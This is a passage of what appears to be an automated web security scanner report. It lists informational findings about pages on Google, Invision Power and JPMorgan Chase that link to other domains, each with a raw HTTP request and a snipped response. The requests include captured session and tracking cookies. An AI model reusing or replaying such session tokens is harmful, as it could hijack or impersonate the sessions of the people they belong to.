Cookie: PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=43=QvwfTsBLG0fY_tCzmQcl5S01_3iEzOWMtfTt7pnwqvW9z0YwdoapJxj1G3iMc9VVflP4ZgfthP6beVczqAQ07TzamFD1mLXnRq6Jo4UMiZbB1HugDq4PXprcSp8yxFS7

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:06:51 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/GeNLY2f-.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 55391

<!doctype html><head><title>ipboard software - Google Search</title><script>window.google={kEI:"m_FJTdL4MoSglAeBvaEh",kEXPI:"17259,17291,28187,28334,28387,28402",kCSI:{e:"17259,17291,28187,28334,28387
...[SNIP]...
</div><a href="http://www.youtube.com/results?q=ipboard+software&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.julong.com.cn/en/News/188.html" class=l onmousedown="return clk(this.href,'','','','1','','0CBIQFjAA')">Release of <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:6zPAbdiM6HsJ:www.julong.com.cn/en/News/188.html+ipboard+software&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CBcQIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.invisionpower.com/products/board/" class=l onmousedown="return clk(this.href,'','','','2','','0CBkQFjAB')">Community Forum <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:efdVqbelowMJ:www.invisionpower.com/products/board/+ipboard+software&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CB4QIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.invisionpower.com/" class=l onmousedown="return clk(this.href,'','','','3','','0CCAQFjAC')">Community &amp; Forum <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:7ETs2caA0eMJ:www.invisionpower.com/+ipboard+software&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CCUQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://ipboard-software.software.informer.com/" class=l onmousedown="return clk(this.href,'','','','4','','0CCgQFjAD')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:rwIJ10wJfloJ:ipboard-software.software.informer.com/+ipboard+software&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','4','','0CC0QIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Invision_Power_Board" class=l onmousedown="return clk(this.href,'','','','5','','0CC4QFjAE')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:L3-QgO6ibUgJ:en.wikipedia.org/wiki/Invision_Power_Board+ipboard+software&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CDMQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.learningsolutions.com.hk/index.php?option=com_content&amp;task=view&amp;id=7&amp;Itemid=13" class=l onmousedown="return clk(this.href,'','','','6','','0CDUQFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:qPr5yokz3P8J:www.learningsolutions.com.hk/index.php%3Foption%3Dcom_content%26task%3Dview%26id%3D7%26Itemid%3D13+ipboard+software&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:qPr5yokz3P8J:www.learningsolutions.com.hk/index.php%3Foption%3Dcom_content%26task%3Dview%26id%3D7%26Itemid%3D13+ipboard+software&cd=6&hl=en&ct=clnk&source=www.google.com','','','','6','','0CDoQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://search.wareseeker.com/ip-board/" class=l onmousedown="return clk(this.href,'','','','7','','0CDwQFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:y9-HsmKodEEJ:search.wareseeker.com/ip-board/+ipboard+software&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','7','','0CEMQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.forum-software.org/tag/ipboard" class=l onmousedown="return clk(this.href,'','','','8','','0CEUQFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:qnHi427Jq2oJ:www.forum-software.org/tag/ipboard+ipboard+software&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','8','','0CEoQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.universalbot.com/supported-bots/forum-posting-bots/ipboard-software" class=l onmousedown="return clk(this.href,'','','','9','','0CEsQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:odF-vkzGMi8J:www.universalbot.com/supported-bots/forum-posting-bots/ipboard-software+ipboard+software&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CFAQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.china-iwb.com/abcde/Editor/UploadFile/2009522165941674.pdf" class=l onmousedown="return clk(this.href,'','','','10','','0CFIQFjAJ')"><em>
...[SNIP]...

16.118. http://www.google.com/support/news/bin/answer.py  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /support/news/bin/answer.py

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /support/news/bin/answer.py?answer=59255&hl=en HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Set-Cookie: N_T=sess%3Df98c3b992000e%26v%3D2%26c%3D3e2de387%26s%3D4d4a0064%26t%3DA%3A0%3A59255%26sessref%3D; Expires=Thu, 03-Feb-2011 01:39:57 GMT; Path=/support; HttpOnly
Content-Type: text/html; charset=UTF-8
Date: Thu, 03 Feb 2011 01:09:57 GMT
Expires: Thu, 03 Feb 2011 01:09:57 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<script type="text/javascript">serverResponseTimeDelta=window.external&&window.extern
...[SNIP]...
<li class="LeftNav_Blog">
<a href="http://googlenewsblog.blogspot.com" onclick="track('LeftNav', 'Blog');urchinTracker('/support/outgoing/blog/en');">News Blog</a>
...[SNIP]...
<li style="background-image:url(//www.google.com/images/icons/product/blogger-16.png);">
<a href="http://www.blogger.com/blog_this.pyra?u=http%3A%2F%2Fwww.google.com%2Fsupport%2Fnews%2Fbin%2Fanswer.py%3Fhl%3Den%26answer%3D59255%26ctx%3Dshare&n=RSS+Feeds+-+Available+Google+News+Feeds"
onclick="track('Page Actions',
'Share - Blogger')"
target="_blank">
Blogger</a>
...[SNIP]...
<li style="background-image:url(//www.google.com/images/icons/product/orkut-16.png);">
<a href="http://promote.orkut.com/preview?nt=orkut.com&du=http%3A%2F%2Fwww.google.com%2Fsupport%2Fnews%2Fbin%2Fanswer.py%3Fhl%3Den%26answer%3D59255%26ctx%3Dshare&tt=RSS+Feeds+-+Available+Google+News+Feeds"
onclick="track('Page Actions',
'Share - Orkut')"
target="_blank">
Orkut</a>
...[SNIP]...
<li style="background-image:url()" class="combo-mod-item ">
<a href="http://gnews.briefer.net/"
onclick="track('Combo Module', 'npg');" >
gNews Briefer</a>
...[SNIP]...
</script>
<script type="text/javascript" src="//www.blogger.com/feeds/1711799623563669845/posts/default?alt=json-in-script&callback=build_posts&max-results=1&orderby=published"></script>
...[SNIP]...
</script>
<script src='//www.google-analytics.com/ga.js'
type='text/javascript'>
</script>
...[SNIP]...

16.119. http://www.google.com/support/news/bin/answer.py  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /support/news/bin/answer.py

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /support/news/bin/answer.py?answer=40237&topic=8851&hl=en HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Set-Cookie: N_T=sess%3D4d822f04cf339198%26v%3D2%26c%3Da305e907%26s%3D4d4a0063%26t%3DA%3A0%3A40237%26sessref%3D; Expires=Thu, 03-Feb-2011 01:39:55 GMT; Path=/support; HttpOnly
Content-Type: text/html; charset=UTF-8
Date: Thu, 03 Feb 2011 01:09:55 GMT
Expires: Thu, 03 Feb 2011 01:09:55 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<script type="text/javascript">serverResponseTimeDelta=window.external&&window.extern
...[SNIP]...
<li class="LeftNav_Blog">
<a href="http://googlenewsblog.blogspot.com" onclick="track('LeftNav', 'Blog');urchinTracker('/support/outgoing/blog/en');">News Blog</a>
...[SNIP]...
<li style="background-image:url(//www.google.com/images/icons/product/blogger-16.png);">
<a href="http://www.blogger.com/blog_this.pyra?u=http%3A%2F%2Fwww.google.com%2Fsupport%2Fnews%2Fbin%2Fanswer.py%3Fhl%3Den%26answer%3D40237%26ctx%3Dshare&n=How+it+Works+-+Languages+and+regions"
onclick="track('Page Actions',
'Share - Blogger')"
target="_blank">
Blogger</a>
...[SNIP]...
<li style="background-image:url(//www.google.com/images/icons/product/orkut-16.png);">
<a href="http://promote.orkut.com/preview?nt=orkut.com&du=http%3A%2F%2Fwww.google.com%2Fsupport%2Fnews%2Fbin%2Fanswer.py%3Fhl%3Den%26answer%3D40237%26ctx%3Dshare&tt=How+it+Works+-+Languages+and+regions"
onclick="track('Page Actions',
'Share - Orkut')"
target="_blank">
Orkut</a>
...[SNIP]...
<li style="background-image:url()" class="combo-mod-item ">
<a href="http://gnews.briefer.net/"
onclick="track('Combo Module', 'npg');" >
gNews Briefer</a>
...[SNIP]...
</script>
<script type="text/javascript" src="//www.blogger.com/feeds/1711799623563669845/posts/default?alt=json-in-script&callback=build_posts&max-results=1&orderby=published"></script>
...[SNIP]...
</script>
<script src='//www.google-analytics.com/ga.js'
type='text/javascript'>
</script>
...[SNIP]...

16.120. http://www.google.com/support/news_pub/bin/static.py  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /support/news_pub/bin/static.py

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /support/news_pub/bin/static.py?page=contact_policy.cs&hl=en HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Set-Cookie: N_T=sess%3D44a9cb4a3ec276fd%26v%3D2%26c%3D6de206f%26s%3D4d4a007e%26t%3Ds%3A0%3Acontact_policy.cs%26sessref%3D; Expires=Thu, 03-Feb-2011 01:40:22 GMT; Path=/support; HttpOnly
Content-Type: text/html; charset=UTF-8
Date: Thu, 03 Feb 2011 01:10:22 GMT
Expires: Thu, 03 Feb 2011 01:10:22 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<script type="text/javascript">serverResponseTimeDelta=window.external&&window.extern
...[SNIP]...
<li class="LeftNav_Blog">
<a href="http://googlenewsblog.blogspot.com" onclick="track('LeftNav', 'Blog');urchinTracker('/support/outgoing/blog/en');">News Blog</a>
...[SNIP]...
</script>
<script src='//www.google-analytics.com/ga.js'
type='text/javascript'>
</script>
...[SNIP]...

16.121. http://www.google.com/support/websearch/bin/answer.py  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /support/websearch/bin/answer.py

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /support/websearch/bin/answer.py?hl=en&answer=186645 HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Set-Cookie: N_T=sess%3D7c057a4e1afa6cc8%26v%3D2%26c%3D8bb74c16%26s%3D4d4a003e%26t%3DA%3A1%3A186645%26sessref%3D; Expires=Thu, 03-Feb-2011 01:39:19 GMT; Path=/support; HttpOnly
Content-Type: text/html; charset=UTF-8
Date: Thu, 03 Feb 2011 01:09:19 GMT
Expires: Thu, 03 Feb 2011 01:09:19 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<script type="text/javascript">serverResponseTimeDelta=window.external&&window.extern
...[SNIP]...
</script>
<script src='//www.google-analytics.com/ga.js'
type='text/javascript'>
</script>
...[SNIP]...

16.122. http://www.google.com/url  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /url?url=http://search.wareseeker.com/&rct=j&sa=X&ei=rtlJTei7OYL6lweT2cU3&ved=0CEEQ6QUoAA&q=ipboard+software&usg=AFQjCNHs355liiYRYFbI4PAZ93rZ5S9V5w HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:13:11 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<body><a href="http://search.wareseeker.com/" id=link target=_parent></body><script>var a=parent,b=parent.google,c=location;if(a!=window&&b){if(b.r){b.r=0;document.getElementById("link").click();}}els
...[SNIP]...

16.123. http://www.google.com/url  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /url?url=http://www.youtube.com/watch%3Fv%3D&rct=j&sa=X&ei=4AT0T HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:13:14 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<body><a href="http://www.youtube.com/watch?v=" id=link target=_parent></body><script>var a=parent,b=parent.google,c=location;if(a!=window&&b){if(b.r){b.r=0;document.getElementById("link").click();}}e
...[SNIP]...

16.124. http://www.google.com/webhp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /webhp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /webhp?q=bluefin+tuna&hl=en&tab=nw HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:08:30 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google</title><script>window.google={kEI:"DgBKTf-lOZ_Af-Si8N0P",kEXPI:"17259,17291,28187,28334,2838
...[SNIP]...
</div><a href="http://www.youtube.com/?q=bluefin+tuna&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...

16.125. http://www.google.com/webhp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /webhp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /webhp?hl=en HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:08:11 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google</title><script>window.google={kEI:"-_9JTceXM5maeJnsregC",kEXPI:"17259,17291,28187,28334,2838
...[SNIP]...
</div><a href="http://www.youtube.com/?hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...

16.126. http://www.invisionpower.com/store/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.invisionpower.com
Path:   /store/index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /store/index.php?product=board HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:26 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: session_id=db5280c9ad74368a0e9a0bb177be3ea3; path=/; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 01:16:26 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 23290

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
<div id="LiveChat_1296668176"><a href="http://www.livechatinc.com/?partner=lc_1043255">live chat software</a>
...[SNIP]...

16.127. http://www.jpmorganchase.com/corporate/Home/home.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorganchase.com
Path:   /corporate/Home/home.htm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /corporate/Home/home.htm?flv_movie_name=142375_biz_550x310.flv HTTP/1.1
Host: www.jpmorganchase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Wed, 02 Feb 2011 22:19:28 GMT
Content-type: text/html
Connection: close

<html xmlns:xalan="http://xml.apache.org/xalan" xmlns:java="http://xml.apache.org/xslt/java" LANG="EN">
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>JPMorgan Chase
...[SNIP]...
</div>
<a class="gn_bold" href="http://www.jpmorgan.com/pages/jpmorgan">JPMORGAN.COM</a> &nbsp;|&nbsp;
<a class="gn_bold" href="https://www.chase.com">CHASE.COM</a>
...[SNIP]...
<br />
<a id="lnk_pressrels" title="About Us" pcg="glbl_nav" onfocus="clear_tmout(); closeMenu('nav_about_us','lnk_investor');" onblur="clearAndSet_tmout('nav_about_us');" href="http://investor.shareholder.com/jpmorganchase/press/releases.cfm"><img alt="" src="/corporate/includes/images/secondary_nav_bullet.gif" />
...[SNIP]...
<div id="nav_investor_relations_container"><a id="lnk_investor" title="Primary Section" pcg="glbl_nav" onfocus="navHighlight('nav_investor_relations'); clear_tmout(); setCurrentNavLocationTitle(this.id); closeMenu('nav_investor_relations','lnk_corpresp');" onmouseover="navHighlight('nav_investor_relations'); clear_tmout(); setCurrentNavLocationTitle(this.id);" onblur="clearAndSet_tmout('nav_investor_relations');" onmouseout="clearAndSet_tmout('nav_investor_relations');" href="http://investor.shareholder.com/jpmorganchase/">INVESTOR RELATIONS &nbsp; <img class="nav_arrow" alt="" src="/corporate/includes/images/nav_arrow_gray.gif" />
...[SNIP]...
<div class="secondary_section noBorder"><a class="pt_bold" id="lnk_fininfo" title="Investor Relations" pcg="glbl_nav" onfocus="clear_tmout(); closeMenu('nav_investor_relations','lnk_corpresp');" onblur="clearAndSet_tmout('nav_investor_relations');" href="http://investor.shareholder.com/jpmorganchase/financial.cfm">Financial Information</a><br />
<a id="lnk_annualrep" title="Investor Relations" pcg="glbl_nav" onfocus="clear_tmout(); closeMenu('nav_investor_relations','lnk_corpresp');" onblur="clearAndSet_tmout('nav_investor_relations');" href="http://investor.shareholder.com/jpmorganchase/annual.cfm"><img alt="" src="/corporate/includes/images/secondary_nav_bullet.gif" />
...[SNIP]...
<br />
<a class="pt_bold" id="lnk_investpres" title="Investor Relations" pcg="glbl_nav" onfocus="clear_tmout(); closeMenu('nav_investor_relations','lnk_corpresp');" onblur="clearAndSet_tmout('nav_investor_relations');" href="http://investor.shareholder.com/jpmorganchase/presentations.cfm">Investor presentations</a><br />
<a class="pt_bold" id="lnk_shareholderinfo" title="Investor Relations" pcg="glbl_nav" onfocus="clear_tmout(); closeMenu('nav_investor_relations','lnk_corpresp');" onblur="clearAndSet_tmout('nav_investor_relations');" href="http://investor.shareholder.com/jpmorganchase/info.cfm">Shareholder information</a>
...[SNIP]...
</div>
<a id="lnk_jpm" title="Log In J.P. Morgan Clients" pcg="glbl_nav" onfocus="clear_tmout(); closeMenu('nav_log_in','menuend');" onblur="clearAndSet_tmout('nav_log_in');" href="http://www.jpmorgan.com/pages/jpmorgan"><img alt="" src="/corporate/includes/images/secondary_nav_bullet.gif" />
...[SNIP]...
<br />
<a id="lnk_morcom" title="Log In J.P. Morgan Clients" pcg="glbl_nav" onfocus="clear_tmout(); closeMenu('nav_log_in','menuend');" onblur="clearAndSet_tmout('nav_log_in');" href="https://iblogin.jpmorgan.com/sso/action/federateLogin?URI=https://morcom.jpmorgan.com/IB/PostTrade&amp;msg=&#43;&amp;securityLevel=300&amp;ignorespnego=true&amp;app=254651&amp;ref=289732&amp;cs=J&#43;nIFXehcXRtj&#43;r9OfWLWzgaaHk="><img alt="" src="/corporate/includes/images/secondary_nav_bullet.gif" />
...[SNIP]...
<br />
<a id="lnk_morganmkts" title="Log In J.P. Morgan Clients" pcg="glbl_nav" onfocus="clear_tmout(); closeMenu('nav_log_in','menuend');" onblur="clearAndSet_tmout('nav_log_in');" href="https://mm.jpmorgan.com/index.jsp?pageName=country_earea"><img alt="" src="/corporate/includes/images/secondary_nav_bullet.gif" />
...[SNIP]...
<br />
<a id="lnk_jpmaccess" title="Log In J.P. Morgan Clients" pcg="glbl_nav" onfocus="clear_tmout(); closeMenu('nav_log_in','menuend');" onblur="clearAndSet_tmout('nav_log_in');" href="http://www.jpmorganaccess.com"><img alt="" src="/corporate/includes/images/secondary_nav_bullet.gif" />
...[SNIP]...
<br />
<a id="lnk_moresvcs" title="J.P. Morgan Clients" pcg="glbl_nav" onfocus="clear_tmout(); closeMenu('nav_log_in','menuend');" onblur="clearAndSet_tmout('nav_log_in');" href="http://www.jpmorgan.com/pages/jpmorgan/clientlogon"><img alt="" src="/corporate/includes/images/secondary_nav_bullet.gif" />
...[SNIP]...
</div>
<a id="lnk_chasecusts" title="Log In Chase Customers" pcg="glbl_nav" onfocus="clear_tmout(); closeMenu('nav_log_in','menuend');" onblur="clearAndSet_tmout('nav_log_in');" href="https://chaseonline.chase.com/Logon.aspx"><img alt="" src="/corporate/includes/images/secondary_nav_bullet.gif" />
...[SNIP]...
<br />
<a id="lnk_chasebiz" title="Log In Chase Customers" pcg="glbl_nav" onfocus="clear_tmout(); closeMenu('nav_log_in','menuend');" onblur="clearAndSet_tmout('nav_log_in');" href="https://chaseonline.chase.com/Logon.aspx?fromLoc=BUS&amp;LOB=COLLogon"><img alt="" src="/corporate/includes/images/secondary_nav_bullet.gif" />
...[SNIP]...
</div>
<a id="lnk_chaseopenacct" title="Open an Account" pcg="glbl_nav" onfocus="clear_tmout(); closeMenu('nav_log_in','menuend');" onblur="clearAndSet_tmout('nav_log_in');" href="https://www.chase.com/Chase.html"><img alt="" src="/corporate/includes/images/secondary_nav_bullet.gif" />
...[SNIP]...
<br />
<a id="lnk_bizopenacct" title="Open an Account" pcg="glbl_nav" onfocus="clear_tmout(); closeMenu('nav_log_in','menuend');" onblur="clearAndSet_tmout('nav_log_in');" href="https://www.chase.com/ccp/index.jsp?pg_name=ccpmapp/smallbusiness/home/page/business-banking"><img alt="" src="/corporate/includes/images/secondary_nav_bullet.gif" />
...[SNIP]...
